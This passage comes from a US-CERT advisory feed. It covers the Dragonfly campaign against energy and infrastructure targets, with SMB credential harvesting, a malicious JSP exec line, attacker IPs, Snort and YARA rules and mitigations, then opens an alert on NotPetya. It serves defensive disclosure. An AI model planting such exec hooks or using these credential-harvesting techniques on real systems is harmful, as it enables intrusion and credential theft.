target.”Technical DetailsThe threat actors in this campaign employed a variety of TTPs, including:open-source reconnaissance,spear-phishing emails (from compromised legitimate accounts),watering-hole domains,host-based exploitation,industrial control system (ICS) infrastructure targeting, andongoing credential gathering.Using Cyber Kill Chain for AnalysisDHS leveraged the Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the objective. This section will provide a high-level overview of activity within this framework.Stage 1: ReconnaissanceThe threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets. It is known that threat actors are actively accessing publicly available information hosted by organization-monitored networks. DHS further assesses that threat actors are seeking to identify information pertaining to network and organizational design, as well as control system capabilities, within organizations.Forensic analysis identified that threat actors are conducting open-source reconnaissance of their targets, gathering information posted on company-controlled websites. This is a common tactic for collecting the information needed for targeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may appear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a small photo from a publically accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.Analysis also revealed that the threat actors used compromised staging target networks to conduct open-source reconnaissance to identify potential targets of interest and intended targets. “Targets of interest” refers to organizations that DHS observed the threat actors showing an active interest in, but where no compromise was reported. Specifically, the threat actors accessed publically web-based remote access infrastructure such as websites, remote email access portals, and virtual private network (VPN) connections.Stage 2: WeaponizationSpear-Phishing Email TTPsThroughout the spear-phishing campaign, threat actors used email attachments to leverage legitimate Microsoft Office functions to retrieve a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server prior to retrieving the requested file. (Note: It is not necessary for the file to be retrieved for the transfer of credentials to occur.) The threat actors then likely used password-cracking techniques to obtain the plaintext password. Once actors obtain valid credentials, they are able to masquerade as authorized users.Stage 3: DeliveryWhen seeking to compromise the target network, threat actors used a spear-phishing email campaign that differed from previously reported TTPs. The spear-phishing email used a generic contract agreement theme, with the subject line “AGREEMENT & Confidential”, and which contained a generic PDF document, titled “’’document.pdf”. (Note the inclusion of two single apostrophes at the beginning of the attachment name.) The PDF itself was not malicious and did not contain any active code. The document prompted the user to click on a link should a download not automatically begin. (Note: No code within the PDF initiated a download.) The link directs users to a website via a shortened URL, which may prompt them to retrieve a malicious file.In previous reporting, DHS and FBI identified the common themes used in these spear-phishing emails, all emails referred to control systems or process control systems. The threat actors continue to use these themes, specifically against intended target organizations. Email messages include references to common industrial control equipment and protocols. The emails leveraged malicious Microsoft Word attachments that appear to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, as well as invitations and policy documents that entice the user to open the attachment. The list of file names has been published in the IOC.Stage 4: ExploitationThreat actors used distinct and unusual TTPs (i.e., successive redirects) in the phishing campaign directed at staging targets. Emails contained a stacked URL-shortening link that directed the user to http://bit[.]ly/2m0x8IH link, which redirected the user to http://tinyurl[.]com/h3sdqck link, which redirected the user to the ultimate destination of http://imageliners[.]com/nitel. The imageliner[.]com website contained an email address and password input fields mimicking a login page for a website.When exploiting the intended targets, threat actors used malicious .docx files to capture user credentials, however, DHS did not observe the actors establishing persistence on the user’s system. The documents attempt to retrieve a file through a “file:\\” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139 and User Datagram Protocol (UDP) ports 137 or 138. This connection is made to a command and control (C2) server — either a server owned by the threat actors or that of a compromised system owned by a staging location victim. When a user is authenticated as a domain user, this will provide the C2 server with the hash of the victim. Local users will receive a graphical user interface (GUI) prompt to enter a username and password. This information will be provided to the C2 over TCP ports 445 or 139 and UDP ports 137 or 138. (Note: A file transfer is not necessary for a loss of credential information.) Symantec’s report associates this behavior to the Dragonfly threat actors in this campaign. [3]Use of Watering Hole DomainsOne of the threat actors’ primary uses for staging targets is to develop watering holes. The threat actors compromise the infrastructure of trusted organizations to reach intended targets. [4] Although these watering holes may host legitimate content by reputable organizations, the threat actors have altered them to contain and reference malicious content. Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure.Using a similar SMB collection technique, the actors manipulated these websites by altering JavaScript and PHP files that redirect to an IP address on port 445 for credential harvesting. The compromised sites include both custom developed web applications and template-based frameworks. The threat actors injected a line of code into header.php, a legitimate PHP file that carried out the redirected traffic.There is no indication that threat actors used zero-day exploits to manipulate the sites; the threat actors more likely used legitimate credentials to access the website content directly.Stage 5: InstallationThe threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication is not used. [5] Once inside of an intended target’s network, the threat actors downloaded tools from a remote server. The initial versions of the file names contained .txt extensions and were renamed to the appropriate extension, typically .exe or .zip.In one example, after gaining remote access to the network of an intended victim, the threat actor carried out the following actions:The threat actor connected to 91.183.104[.]150 and downloaded multiple files, specifically the file INST.txt.The files were renamed to new extensions, with INST.txt being renamed INST.exe.The files were executed on the host and then immediately deleted.The execution of INST.exe triggered a download of ntdll.exe, and shortly after, ntdll.exe appeared in the running process list of a compromised system of an intended target.In their report on Dragonfly, Symantec associated the MD5 hash of INST.exe to Backdoor.Goodor. The MD5 hashes for the previously mentioned files can be found in the IOC list above.Several of these files were scripts that were used for creating the initial account leveraged by the threat actors. The initial script symantec_help.jsp contained a one-line reference to a malicious script. It was located at C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\.Contents of symantec_help.jsp____________________________________________________________________________________________________________________<% Runtime.getRuntime().exec("cmd /C \"" + System.getProperty("user.dir") + "\\..\\webapps\\ROOT\\<REDACTED SCRIPT NAME>\""); %>____________________________________________________________________________________________________________________The malicious script created a user account, disabled the host-based firewall, and globally opened port 3389 for Remote Desktop Protocol (RDP) access. The script then attempted to add the newly created account to the administrators group for elevated privileges. This script contained hard-coded values for the group name “administrator” in Spanish, Italian, German, French, and English.In addition, the threat actors also created a scheduled task “reset”, which was designed to automatically log out of their newly created account every eight hours.Contents of Scheduled Task____________________________________________________________________________________________________________________<?xml version="1.0" encoding="UTF-16"?><Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo>  <Date>2017-06-25T11:51:17.4848488</Date>  <Author><REDACTED></Author> </RegistrationInfo> <Triggers>  <TimeTrigger>   <StartBoundary>2017-06-25T12:30:29</StartBoundary>   <Enabled>true</Enabled>  </TimeTrigger> </Triggers> <Principals>  <Principal id="Author">   <RunLevel>LeastPrivilege</RunLevel>   <UserId><REDACTED USERNAME></UserId>   <LogonType>InteractiveToken</LogonType>  </Principal> </Principals> <Settings>  <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>  <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>  <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>  <AllowHardTerminate>true</AllowHardTerminate>  <StartWhenAvailable>false</StartWhenAvailable>  <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>  <IdleSettings>   <StopOnIdleEnd>true</StopOnIdleEnd>   <RestartOnIdle>false</RestartOnIdle>  </IdleSettings>  <AllowStartOnDemand>true</AllowStartOnDemand>  <Enabled>true</Enabled>  <Hidden>false</Hidden>  <RunOnlyIfIdle>false</RunOnlyIfIdle>  <WakeToRun>false</WakeToRun>  <ExecutionTimeLimit>P3D</ExecutionTimeLimit>  <Priority>7</Priority> </Settings> <Actions Context="Author">  <Exec>   <Command>logoff</Command>  </Exec> </Actions></Task>____________________________________________________________________________________________________________________After achieving access to staging targets, the threat actors installed tools to carry out their mission. On one occasion, threat actors installed the free version of Forticlient, which was presumably used as a VPN client for intended targets.Consistent with the perceived goal of credential harvesting, the threat actor was observed dropping and executing open source and free tools such as Hydra, SecretsDump, and CrackMapExec. The naming convention and download locations suggest that these files were downloaded directly from publically available locations such as GitHub. Forensic analysis indicates that many of these tools were executed during the timeframe in which the threat actor was accessing the system. Of note, the threat actor installed Python 2.7 on a compromised host of one staging victim, and a Python script was seen at C:\Users\<Redacted Username>\Desktop\OWAExchange\. In the previous folder structure, a subfolder named “out” held multiple text files.Persistence Through .LNK File ManipulationThe threat actors manipulated .lnk files to repeatedly gather user credentials. Default Windows functionality enables icons to be loaded from a local Windows repository. The threat actors exploited this built-in Windows functionality by setting the icon path to their remote controlled server. When the user browses to the directory, Windows attempts to load the icon and initiate an SMB authentication session. During this process, the active user’s credentials are passed through the attempted SMB connection. The threat actors used this tactic in both Virtual Desktop Infrastructure (VDI) and traditional environments.                Three of the observed .lnk files were SETROUTE.lnk, notepad.exe.lnk, and Document.lnk. These names appear to be contextual, and threat actors may use a variety of other file names within this tactic. Two of the remote servers observed in these .lnk files were 62.8.193[.]206 and 5.153.58[.]45.Establishing Local AccountsThe threat actors created accounts on the staging target for ongoing operations. These accounts, masquerading as legitimate service accounts, appeared to be tailored to each individual staging target. Each account created by the threat actors served a specific purpose in their operation. DHS and FBI identified the creation of four local accounts on a compromised server. The server operated as both a domain controller and an email server for a staging target.Account 1: The threat actors created a local account, which was named to mimic backup services of the staging target. This account was created by the aforementioned malicious script. The threat actors used this account to conduct open-source reconnaissance and remotely access intended targets. This account was also used to remove the Forticlient software.Account 2: Account 1 was used to create Account 2 to impersonate an email administration account. The only observed action was to create Account 3.Account 3: The threat actors created Account 3 in the staging victim’s Microsoft Exchange Server. A PowerShell script created this account during an RDP session while the threat actor was authenticated as Account 2. The naming conventions of the created Microsoft Exchange account followed that of the staging target (e.g., first initial concatenated with the last name).Account 4: In the latter stage of the compromise, the threat actor used Account 1 to create Account 4, a local administrator account. Account 4 was then used to delete the following logs: system, security, terminal services, remote services, and audit. Registry analysis indicated that this activity was likely scripted.Stage 6: Command and ControlThe threat actors commonly use web shells to compromise publically available servers to gain a foothold into internal networks. This activity has been observed on both web and email servers. The threat actors then establish an encrypted connection over port 443 to the web shell. Once connected, the threat actors download additional malicious files from the threat actors’ servers to the publically available server. Two of the web shells (AutoDiscover.aspx and global.aspx) used by the actors are detailed in the accompanying IOC list. Despite having different file names, the MD5 hashes of the two web shells indicated that the two files were the same file. These web shells have been associated with the ciklon_z webshell.DHS and FBI identified the threat actors leveraging remote access services and infrastructure, such as VPN, RDP, and Outlook Web Access (OWA). The threat actors used staging targets to connect to several intended targets, effectively turning the staging targets into command and control points. To date, it is presumed that the threat actors have targeted services that use single-factor authentication. DHS believes that the threat actors employ this methodology to avoid detection and attribution.Targeting of ICS and SCADA InfrastructureUpon gaining access to intended victims, the threat actors conducted reconnaissance operations within the network. Specifically, the threat actors focused on identifying and browsing file servers within the intended victim’s network. The threat actors viewed files pertaining to ICS or Supervisory Control and Data Acquisition (SCADA) systems. Based on DHS analysis of existing compromises, these files were originally named containing ICS vendor names and ICS reference documents pertaining to the organization (e.g., “SCADA WIRING DIAGRAM.pdf” or “SCADA PANEL LAYOUTS.xlsx”).In one instance, the threat actors accessed workstations and servers on a corporate network that contained data output from control systems within energy generation facilities. In this same incident, the threat actors created a malicious scheduled task that invoked “scr.exe” with the arguments “scr.jpg”. The MD5 hash of scr.exe matched the MD5 of ScreenUtil, a tool used by the threat actor, as reported in the Symantec Dragonfly 2.0 report.Detection and ResponseIOCs related to this campaign are provided within the accompanying .csv and .stix files of this alert. DHS and FBI recommend that network administrators review the IP addresses, domain names, file hashes, network signatures, and YARA rules provided and add the IPs to their watchlist to determine whether malicious activity has been observed within their organization. System owners are also advised to run the YARA tool on any system suspected to have been targeted by these APT actors.Network Signatures and Host-Based RulesThis section contains network signatures and host-based rules that can be used to detect malicious activity associated with threat actors TTPs. Although these network signatures and host-based rules were created using a comprehensive vetting process, the possibility of false positives always remains.Network Signaturesalert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/aspnet_client/system_web/4_0_30319/update/' (Beacon)"; sid:42000000; rev:1; flow:established,to_server; content:"/aspnet_client/system_web/4_0_30319/update/"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)___________________________________alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/img/bson021.dat'"; sid:42000001; rev:1; flow:established,to_server; content:"/img/bson021.dat"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)________________________________________alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/A56WY' (Callback)"; sid:42000002; rev:1; flow:established,to_server; content:"/A56WY"; http_uri; fast_pattern; classtype:bad-unknown; metadata:service http;)_________________________________________alert tcp any any -> any 445 (msg:"SMB Client Request contains 'AME_ICON.PNG' (SMB credential harvesting)"; sid:42000003; rev:1; flow:established,to_server; content:"|FF|SMB|75 00 00 00 00|"; offset:4; depth:9; content:"|08 00 01 00|"; distance:3; content:"|00 5c 5c|"; distance:2; within:3; content:"|5c|AME_ICON.PNG"; distance:7; fast_pattern; classtype:bad-unknown; metadata:service netbios-ssn;)________________________________________alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI OPTIONS contains '/ame_icon.png' (SMB credential harvesting)"; sid:42000004; rev:1; flow:established,to_server; content:"/ame_icon.png"; http_uri; fast_pattern:only; content:"OPTIONS"; nocase; http_method; classtype:bad-unknown; metadata:service http;)_________________________________________alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP Client Header contains 'User-Agent|3a 20|Go-http-client/1.1'"; sid:42000005; rev:1; flow:established,to_server; content:"User-Agent|3a 20|Go-http-client/1.1|0d 0a|Accept-Encoding|3a 20|gzip"; http_header; fast_pattern:only; pcre:"/\.(?:aspx|txt)\?[a-z0-9]{3}=[a-z0-9]{32}&/U"; classtype:bad-unknown; metadata:service http;)__________________________________________alert tcp $EXTERNAL_NET [139,445] -> $HOME_NET any (msg:"SMB Server Traffic contains NTLM-Authenticated SMBv1 Session"; sid:42000006; rev:1; flow:established,to_client; content:"|ff 53 4d 42 72 00 00 00 00 80|"; fast_pattern:only; content:"|05 00|"; distance:23; classtype:bad-unknown; metadata:service netbios-ssn;) YARA RulesThis is a consolidated rule set for malware associated with, consisting of rules written by US-CERT, as well as contributions by trusted partners.*/ rule APT_malware_1{meta:      description = "inveigh pen testing tools & related artifacts"      author = "US-CERT Code Analysis Team"          date = "2017/07/17"      hash0 = "61C909D2F625223DB2FB858BBDF42A76"      hash1 = "A07AA521E7CAFB360294E56969EDA5D6"      hash2 = "BA756DD64C1147515BA2298B6A760260"      hash3 = "8943E71A8C73B5E343AA9D2E19002373"      hash4 = "04738CA02F59A5CD394998A99FCD9613"      hash5 = "038A97B4E2F37F34B255F0643E49FC9D"      hash6 = "65A1A73253F04354886F375B59550B46"      hash7 = "AA905A3508D9309A93AD5C0EC26EBC9B"      hash8 = "5DBEF7BDDAF50624E840CCBCE2816594"      hash9 = "722154A36F32BA10E98020A8AD758A7A"      hash10 = "4595DBE00A538DF127E0079294C87DA0"strings:      $s0 = "file://"      $s1 = "/ame_icon.png"      $s2 = "184.154.150.66"      $s3 = { 87D081F60C67F5086A003315D49A4000F7D6E8EB12000081F7F01BDD21F7DE }      $s4 = { 33C42BCB333DC0AD400043C1C61A33C3F7DE33F042C705B5AC400026AF2102 }      $s5 = "(g.charCodeAt(c)^l[(l[b]+l[e])%256])"      $s6 = "for(b=0;256>b;b++)k[b]=b;for(b=0;256>b;b++)"      $s7 = "VXNESWJfSjY3grKEkEkRuZeSvkE="      $s8 = "NlZzSZk="      $s9 = "WlJTb1q5kaxqZaRnser3sw=="      $s10 = "for(b=0;256>b;b++)k[b]=b;for(b=0;256>b;b++)"      $s11 = "fromCharCode(d.charCodeAt(e)^k[(k[b]+k[h])%256])"      $s12 = "ps.exe -accepteula \\%ws% -u %user% -p %pass% -s cmd /c netstat"      $s13 = { 22546F6B656E733D312064656C696D733D5C5C222025254920494E20286C6973742E74787429 }      $s14 = { 68656C6C2E657865202D6E6F65786974202D657865637574696F6E706F6C69637920627970617373202D636F6D6D616E6420222E202E5C496E76656967682E70 }      $s15 = { 476F206275696C642049443A202266626433373937623163313465306531 }  //inveigh pentesting tools       $s16 = { 24696E76656967682E7374617475735F71756575652E4164642822507265737320616E79206B657920746F2073746F70207265616C2074696D65 } //specific malicious word document PK archive       $s17 = { 2F73657474696E67732E786D6CB456616FDB3613FEFE02EF7F10F4798E64C54D06A14ED125F19A225E87C9FD0194485B }      $s18 = { 6C732F73657474696E67732E786D6C2E72656C7355540500010076A41275780B0001040000000004000000008D90B94E03311086EBF014D6F4D87B48214471D2 }      $s19 = { 8D90B94E03311086EBF014D6F4D87B48214471D210A41450A0E50146EBD943F8923D41C9DBE3A54A240ACA394A240ACA39 }      $s20 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }      $s21 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }      $s22 = "5.153.58.45"      $s23 = "62.8.193.206"      $s24 = "/1/ree_stat/p"      $s25 = "/icon.png"      $s26 = "/pshare1/icon"      $s27 = "/notepad.png"      $s28 = "/pic.png"      $s29 = "http://bit.ly/2m0x8IH"     condition:      ($s0 and $s1 or $s2) or ($s3 or $s4) or ($s5 and $s6 or $s7 and $s8 and $s9) or ($s10 and $s11) or ($s12 and $s13) or ($s14) or ($s15) or ($s16) or ($s17) or ($s18) or ($s19) or ($s20) or ($s21) or ($s0 and $s22 or $s24) or ($s0 and $s22 or $s25) or ($s0 and $s23 or $s26) or ($s0 and $s22 or $s27) or ($s0 and $s23 or $s28) or ($s29)} rule APT_malware_2{meta:      description = "rule detects malware"      author = "other"strings:      $api_hash = { 8A 08 84 C9 74 0D 80 C9 60 01 CB C1 E3 01 03 45 10 EB ED }      $http_push = "X-mode: push" nocase      $http_pop = "X-mode: pop" nocasecondition:      any of them} rule Query_XML_Code_MAL_DOC_PT_2{      meta:            name= "Query_XML_Code_MAL_DOC_PT_2"            author = "other"      strings:            $zip_magic = { 50 4b 03 04 }            $dir1 = "word/_rels/settings.xml.rels"            $bytes = {8c 90 cd 4e eb 30 10 85 d7}      condition:            $zip_magic at 0 and $dir1 and $bytes} rule Query_Javascript_Decode_Function{meta:      name= "Query_Javascript_Decode_Function"      author = "other"strings:      $decode1 = {72 65 70 6C 61 63 65 28 2F 5B 5E 41 2D 5A 61 2D 7A 30 2D 39 5C 2B 5C 2F 5C 3D 5D 2F 67 2C 22 22 29 3B}      $decode2 = {22 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78 79 7A 30 31 32 33 34 35 36 37 38 39 2B 2F 3D 22 2E 69 6E 64 65 78 4F 66 28 ?? 2E 63 68 61 72 41 74 28 ?? 2B 2B 29 29}      $decode3 = {3D ?? 3C 3C 32 7C ?? 3E 3E 34 2C ?? 3D 28 ?? 26 31 35 29 3C 3C 34 7C ?? 3E 3E 32 2C ?? 3D 28 ?? 26 33 29 3C 3C 36 7C ?? 2C ?? 2B 3D [1-2] 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29 2C 36 34 21 3D ?? 26 26 28 ?? 2B 3D 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29}      $decode4 = {73 75 62 73 74 72 69 6E 67 28 34 2C ?? 2E 6C 65 6E 67 74 68 29}      $func_call="a(\""condition:      filesize < 20KB and #func_call > 20 and all of ($decode*)} rule Query_XML_Code_MAL_DOC{meta:      name= "Query_XML_Code_MAL_DOC"      author = "other"strings:      $zip_magic = { 50 4b 03 04 }      $dir = "word/_rels/" ascii      $dir2 = "word/theme/theme1.xml" ascii      $style = "word/styles.xml" asciicondition:      $zip_magic at 0 and $dir at 0x0145 and $dir2 at 0x02b7 and $style at 0x08fd} Impact This APT actor’s campaign has affected multiple organizations in the energy, nuclear, water, aviation, construction, and critical manufacturing sectors. Solution DHS and FBI encourage network users and administrators to use the following detection and prevention guidelines to help defend against this activity.Network and Host-based SignaturesDHS and FBI recommend that network administrators review the IP addresses, domain names, file hashes, and YARA and Snort signatures provided and add the IPs to their watch list to determine whether malicious activity is occurring within their organization. Reviewing network perimeter netflow will help determine whether a network has experienced suspicious activity. Network defenders and malware analysts should use the YARA and Snort signatures provided in the associated YARA and .txt file to identify malicious activity.Detections and Prevention MeasuresUsers and administrators can detect spear phishing, watering hole, web shell, and remote access activity by comparing all IP addresses and domain names listed in the IOC packages to the following locations:network intrusion detection system/network intrusion protection system  logs,web content logs,proxy server logs,domain name server resolution logs,packet capture (PCAP) repositories,firewall logs,workstation Internet browsing history logs,host-based intrusion detection system /host-based intrusion prevention system (HIPS) logs,data loss prevention logs,exchange server logs,user mailboxes,mail filter logs,mail content logs,AV mail logs,OWA logs,Blackberry Enterprise Server logs, andMobile Device Management logs.To detect the presence of web shells on external-facing servers, compare IP addresses, filenames, and file hashes listed in the IOC packages with the following locations:application logs,IIS/Apache logs,file system,intrusion detection system/ intrusion prevention system logs,PCAP repositories,firewall logs, andreverse proxy.Detect spear-phishing by searching workstation file systems, as well as network-based user directories, for attachment filenames and hashes found in the IOC packages.Detect persistence in VDI environments by searching file shares containing user profiles for all .lnk files.Detect evasion techniques by the threat actors by identifying deleted logs. This can be done by reviewing last-seen entries and by searching for event 104 on Windows system logs.Detect persistence by reviewing all administrator accounts on systems to identify unauthorized accounts, especially those created recently.Detect the malicious use of legitimate credentials by reviewing the access times of remotely accessible systems for all users. Any unusual login times should be reviewed by the account owners.Detect the malicious use of legitimate credentials by validating all remote desktop and VPN sessions of any user’s credentials suspected to be compromised.Detect spear-phishing by searching OWA logs for all IP addresses listed in the IOC packages.Detect spear-phishing through a network by validating all new email accounts created on mail servers, especially those with external user access.Detect persistence on servers by searching system logs for all filenames listed in the IOC packages.Detect lateral movement and privilege escalation by searching PowerShell logs for all filenames ending in “.ps1” contained in the IOC packages. (Note: requires PowerShell version 5, and PowerShell logging must be enabled prior to the activity.)Detect persistence by reviewing all installed applications on critical systems for unauthorized applications, specifically note FortiClient VPN and Python 2.7.Detect persistence by searching for the value of “REG_DWORD 100” at registry location “HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal”. Services\MaxInstanceCount” and the value of “REG_DWORD 1” at location “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\dontdisplaylastusername”.Detect installation by searching all proxy logs for downloads from URIs without domain names.General Best Practices Applicable to this Campaign:Prevent external communication of all versions of SMB and related protocols at the network boundary by blocking TCP ports 139 and 445 with related UDP port 137. See the NCCIC/US-CERT publication on SMB Security Best Practices for more information.Block the Web-based Distributed Authoring and Versioning (WebDAV) protocol on border gateway devices on the network.Monitor VPN logs for abnormal activity (e.g., off-hour logins, unauthorized IP address logins, and multiple concurrent logins).Deploy web and email filters on the network. Configure these devices to scan for known bad domain names, sources, and addresses; block these before receiving and downloading messages. This action will help to reduce the attack surface at the network’s first level of defense. Scan all emails, attachments, and downloads (both on the host and at the mail gateway) with a reputable anti-virus solution that includes cloud reputation services.Segment any critical networks or control systems from business systems and networks according to industry best practices.Ensure adequate logging and visibility on ingress and egress points.Ensure the use of PowerShell version 5, with enhanced logging enabled. Older versions of PowerShell do not provide adequate logging of the PowerShell commands an attacker may have executed. Enable PowerShell module logging, script block logging, and transcription. Send the associated logs to a centralized log repository for monitoring and analysis. See the FireEye blog post Greater Visibility through PowerShell Logging for more information.Implement the prevention, detection, and mitigation strategies outlined in the NCCIC/US-CERT Alert TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance.Establish a training mechanism to inform end users on proper email and web usage, highlighting current information and analysis, and including common indicators of phishing. End users should have clear instructions on how to report unusual or suspicious emails.Implement application directory whitelisting. System administrators may implement application or application directory whitelisting through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from PROGRAMFILES, PROGRAMFILES(X86), SYSTEM32, and any ICS software folders. All other locations should be disallowed unless an exception is granted.Block RDP connections originating from untrusted external addresses unless an exception exists; routinely review exceptions on a regular basis for validity.Store system logs of mission critical systems for at least one year within a security information event management tool.Ensure applications are configured to log the proper level of detail for an incident response investigation.Consider implementing HIPS or other controls to prevent unauthorized code execution.Establish least-privilege controls.Reduce the number of Active Directory domain and enterprise administrator accounts.Based on the suspected level of compromise, reset all user, administrator, and service account credentials across all local and domain systems.Establish a password policy to require complex passwords for all users.Ensure that accounts for network administration do not have external connectivity.Ensure that network administrators use non-privileged accounts for email and Internet access.Use two-factor authentication for all authentication, with special emphasis on any external-facing interfaces and high-risk environments (e.g., remote access, privileged access, and access to sensitive data).Implement a process for logging and auditing activities conducted by privileged accounts.Enable logging and alerting on privilege escalations and role changes.Periodically conduct searches of publically available information to ensure no sensitive information has been disclosed. Review photographs and documents for sensitive data that may have inadvertently been included.Assign sufficient personnel to review logs, including records of alerts.Complete independent security (as opposed to compliance) risk review.Create and participate in information sharing programs.Create and maintain network and system documentation to aid in timely incident response. Documentation should include network diagrams, asset owners, type of asset, and an incident response plan.Report NoticeDHS encourages recipients who identify the use of tools or techniques discussed in this document to report information to DHS or law enforcement immediately. To request incident response resources or technical assistance, contact NCCIC at NCCICcustomerservice@hq.dhs.gov or 888-282-0870. References [1] FireEye. Factors Motivating Cyber Espionage Against the Energy Sector. September 3, 2015 09:21:00AM, 15-00008886, Version: 2 [2] Symantec. Dragonfly: Western energy sector targeted by sophisticated attack group. September 6, 2017. [2] Symantec. Dragonfly: Western energy sector targeted by sophisticated attack group. September 6, 2017. [4] CCIRC CF17-010 UPDATE [5] MIFR-10127623 Revision History October 20, 2017: Initial version March 15, 2018: Updated to provide guidance that this alert has been superseded by newer information. This product is provided subject to this Notification and this Privacy & Use policy. […]

  • TA17-181A: Petya Ransomware
    by US-CERT on 1 luglio 2017 at 5:41 am

    Original release date: July 01, 2017 | Last revised: February 15, 2018Systems Affected Microsoft Windows operating systems Overview This Alert has been updated to reflect the U.S. Government's public attribution of the "NotPetya" malware variant to the Russian military. Additional information may be found in a Statement from the White House Press Secretary. For more information related to NotPetya activity, go to https://www.us-cert.gov/grizzlysteppe.The scope of this Alert’s analysis is limited to the newest Petya malware variant that surfaced on June 27, 2017. This malware is referred to as “NotPetya” throughout this Alert.On June 27, 2017, NCCIC [13] was notified of Petya malware events occurring in multiple countries and affecting multiple sectors. This variant of the Petya malware—referred to as NotPetya—encrypts files with extensions from a hard-coded list. Additionally, if the malware gains administrator rights, it encrypts the master boot record (MBR), making the infected Windows computers unusable. NotPetya differs from previous Petya malware primarily in its propagation methods. The NCCIC Code Analysis Team produced a Malware Initial Findings Report (MIFR) to provide in-depth technical analysis of the malware. In coordination with public and private sector partners, NCCIC is also providing additional indicators of compromise (IOCs) in comma-separated-value (CSV) form for information sharing purposes.Available Files:MIFR-10130295.pdfMIFR-10130295_stix.xmlTA-17-181B_IOCs.csvDescription NotPetya leverages multiple propagation methods to spread within an infected network. According to malware analysis, NotPetya attempts the lateral movement techniques below:PsExec - a legitimate Windows administration toolWMI - Windows Management Instrumentation, a legitimate Windows componentEternalBlue - the same Windows SMBv1 exploit used by WannaCryEternalRomance - another Windows SMBv1 exploitMicrosoft released a security update for the MS17-010 SMB vulnerability on March 14, 2017, which addressed the EternalBlue and EternalRomance lateral movement techniques.Technical DetailsNCCIC received a sample of the NotPetya malware variant and performed a detailed analysis. Based on the analysis, NotPetya encrypts the victim’s files with a dynamically generated, 128-bit key and creates a unique ID of the victim. However, there is no evidence of a relationship between the encryption key and the victim’s ID, which means it may not be possible for the attacker to decrypt the victim’s files even if the ransom is paid. It behaves more like destructive malware rather than ransomware.NCCIC observed multiple methods used by NotPetya to propagate across a network. The first and—in most cases—most effective method, uses a modified version of the Mimikatz tool to steal the user’s Windows credentials. The cyber threat actor can then use the stolen credentials, along with the native Windows Management Instrumentation Command Line (WMIC) tool or the Microsoft SysInternals utility, psexec.exe, to access other systems on the network. Another method for propagation uses the EternalBlue exploit tool to target unpatched systems running a vulnerable version of SMBv1. In this case, the malware attempts to identify other hosts on the network by checking the compromised system’s IP physical address mapping table. Next, it scans for other systems that are vulnerable to the SMB exploit and installs the malicious payload. Refer to the malware report, MIFR-10130295, for more details on these methods.The analyzed sample of NotPetya encrypts the compromised system’s files with a 128-bit Advanced Encryption Standard (AES) algorithm during runtime. The malware then writes a text file on the “C:\” drive that includes a static Bitcoin wallet location as well as unique personal installation key intended for the victim to use when making the ransom payment and the user’s Bitcoin wallet ID. NotPetya modifies the master boot record (MBR) to enable encryption of the master file table (MFT) and the original MBR, and then reboots the system. Based on the encryption methods used, it appears unlikely that the files could be restored, even if the attacker received the victim’s unique key and Bitcoin wallet ID.The delivery mechanism of NotPetya during the June 27, 2017, event was determined to be the Ukrainian tax accounting software, M.E.Doc. The cyber threat actors used a backdoor to compromise M.E. Doc’s development environment as far back as April 14, 2017. This backdoor allowed the threat actor to run arbitrary commands, exfiltrate files, and download and execute arbitrary exploits on the affected system. Organizations should treat systems with M.E.Doc installed as suspicious, and should examine these systems for additional malicious activity. [12] Impact According to multiple reports, this NotPetya malware campaign has infected organizations in several sectors, including finance, transportation, energy, commercial facilities, and healthcare. While these victims are business entities, other Windows systems are also at risk, such as:those that do not have patches installed for the vulnerabilities in MS17‑010, CVE-2017-0144, and CVE-2017-0145, andthose who operate on the  shared network of affected organizations.Negative consequences of malware infection include:temporary or permanent loss of sensitive or proprietary information,disruption to regular operations,financial losses incurred to restore systems and files, andpotential harm to an organization’s reputation.Solution NCCIC recommends against paying ransoms; doing so enriches malicious actors while offering no guarantee that the encrypted files will be released. In this NotPetya incident, the email address for 